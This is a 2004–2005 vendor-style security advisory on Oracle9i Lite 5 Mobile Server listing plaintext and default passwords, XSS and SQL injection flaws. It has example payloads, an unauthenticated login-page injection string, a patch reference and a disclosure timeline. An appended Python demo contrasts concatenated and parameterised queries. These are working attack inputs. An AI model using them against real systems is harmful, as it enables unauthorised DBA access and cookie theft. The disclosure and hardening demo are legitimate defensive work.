Red-Database-Security GmbH is specialized in Oracle Security
Multiple security vulnerabilities in Oracle9i Lite 5
Details

There are multiple vulnerabilities in Oracle9i Lite 5 Mobile Server. A valid account is not necessary to exploit one of the vulnerabilities. For all other vulnerabilities a valid login to Oracle9i Lite Mobile Server is necessary. An attacker can gain unauthorized access as DBA to the Oracle database server which contains the Oracle9i Lite schema.

1. Unencrypted password of DBA stored in repository.log
2. Unencrypted passwords in MOBILEADMIN.APPLICATIONS.DBPWD
3. Default (and unencrypted) password for Webtogo-Administrator
4. XSS in Oracle 9i Lite
5. XSS in Oracle 9i Lite
6. SQL-Injection in Oracle Lite 5i in siteside.jsp
7. SQL-Injection in Oracle Lite 5i in appside.jsp
8. SQL-Injection in Oracle Lite 5i in userside.jsp
9. SQL-Injection in Oracle Lite 5i in search
10. SQL-Injection via login-page
11. SQL-Injection in User Group Properties

Workarounds

There are no workarounds for these security vulnerabilities.

Example

1. Default (and unencrypted) password for Webtogo-Administrator

   Login to Webtogo: http://server01/webtogo/index.html
   User: Administrator
   Password: admin

   ==> Account + unencrypted password is defined in the following file:
       $OH/Mobile/Server/Repository/serveracl.ini
   ==> Encryption is disabled by default (ENCRYPTED=FALSE)

2. XSS in Oracle 9i Lite

   http://server01/webtogo/WLTop/edbkmk?itemid='<script>alert(document.cookie);</script>

3. XSS in Oracle 9i Lite

   http://server01/webtogo/admin/console/ccmenu?order=1'<script>alert(document.cookie);</script>

4. SQL-Injection in Oracle Lite 5i in siteside.jsp

   http://server01/webtogo/admin/console/siteside.jsp#

   ==> '
       Result: ORA-01756: quoted string not properly terminated
   ==> ' or 1=1'
       Result: ORA-00933: SQL command not properly ended
   ==> '|| or 1=1'
       Result: ORA-00936: missing expression

5. SQL-Injection in Oracle Lite 5i in appside.jsp

   http://server01/admin/console/appside.jsp#

   ==> '
       Result: ORA-01756: quoted string not properly terminated
   ==> ' or 1=1'
       Result: ORA-00933: SQL command not properly ended
   ==> '|| or 1=1'
       Result: ORA-00936: missing expression

6. SQL-Injection in Oracle Lite 5i in userside.jsp

   http://server01/webtogo/admin/console/userside#

   ==> '
       Result: ORA-01756: quoted string not properly terminated
   ==> ' or 1=1'
       Result: ORA-00933: SQL command not properly ended
   ==> '|| or 1=1'
       Result: ORA-00936: missing expression

7. Injection in Oracle Lite 5i in search

   http://laptop01/webtogo/admin/console/search?criterea=username&query=&searchtype=2&sortcolumn=name'&sortdirection=asc

   ==> ORA-01756: quoted string not properly terminated

8. Inject SQL commands without a valid user account from the login screen

   a. Go to the login page http://server01/webtogo/index.html
      Username: %' or name like 'alex%
      Password: aaa
   b. Press Login
   c. Oracle Lite returns an error message, but the following SQL statement is executed:
      select id, user_role from users where name='%' OR NAME LIKE 'ALEX%'

9. SQL-Injection in User Group Properties

   http://server01/webtogo/admin/console/groupsinfo?groups ' UNION select 1,null from dba_users where password like '%

   ==> ORA-01789: query block has incorrect number of result columns

Patch Information

An advisory from Oracle is available on OTN:
http://otn.oracle.com/deploy/security/pdf/2004alert63.pdf

A patch for Oracle Lite 5.0.2 is available on Metalink: [metalink.oracle.com]

History

21-oct-2003 Oracle secalert was informed about two security vulnerabilities
22-oct-2003 Seven additional vulnerabilities reported
23-oct-2003 Two additional vulnerabilities reported
23-oct-2003 Bug confirmed
18-feb-2004 Oracle published alert 63
25-apr-2005 Example and time to fix added

© 2005 by Red-Database-Security GmbH - last update 03-nov-2005
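The login-page case in example 8, reproduced as an added example (not code from the advisory or from Oracle): it assumes the lookup is built by pasting the upper-cased user name into the SQL text, which yields exactly the statement quoted in step c, and shows the same input handled through a bound parameter. SQLite stands in for the Oracle Lite database, and the table rows and function names are constructed for illustration.

```python
import sqlite3

# Input typed into the Username field in example 8 of the advisory.
ADVISORY_USERNAME = "%' or name like 'alex%"


def make_db():
    """In-memory stand-in for the users table (constructed rows, assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, user_role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "ADMINISTRATOR", "admin"), (2, "ALEXANDER", "user"), (3, "BOB", "user")],
    )
    return db


def lookup_concatenated(db, username):
    """Assumed flawed form: the upper-cased name becomes part of the SQL text."""
    sql = "select id, user_role from users where name='" + username.upper() + "'"
    return sql, db.execute(sql).fetchall()


def lookup_bound(db, username):
    """Hardened form: the SQL text is fixed and the name is passed as data."""
    sql = "select id, user_role from users where name = ?"
    return sql, db.execute(sql, (username.upper(),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for label, lookup in (("concatenated", lookup_concatenated), ("bound", lookup_bound)):
        sql, rows = lookup(db, ADVISORY_USERNAME)
        print(f"{label}: {sql}\n  rows: {rows}")
```

With the concatenated form the quote in the input closes the string literal and the rest is parsed as a second predicate; with the bound form the whole input is compared as a single name and matches no row.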